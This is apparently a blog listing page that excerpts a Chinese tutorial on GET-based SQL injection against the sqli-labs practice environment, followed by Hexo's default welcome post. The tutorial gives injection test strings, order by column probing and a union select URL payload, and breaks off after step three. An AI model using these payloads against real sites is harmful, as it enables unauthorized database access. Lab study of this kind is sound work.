基于get的注入
前言mysql5.0以上版本 有一个数据库information_schema包含数据库所有表名,列名,数据库名。
数据库中"." ##表示下一级
information——schema.tables ##记录所有信息表名的表
information——schema.columns ##记录所有列名信息的表
一些基本常识数据库版本:version()
数据库名字:database()
数据库用户:user()
操作系统:@@version_compile_os
1:判断是否存在注入点
?id=1 and 1=1 正常
?id=1 and 1=2 错误(存在注入)
2:使用order by 判断
?id=1 and 1=2 order by 4--+ ##报错,说明列数比4小
?id=1 and 1=2 order by 4--+ ##正常
3:使用union select 查询数据回显位置
http://qwer/sqli-labs/Less-2/?id=-1 union select 1,2,3#
4: ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment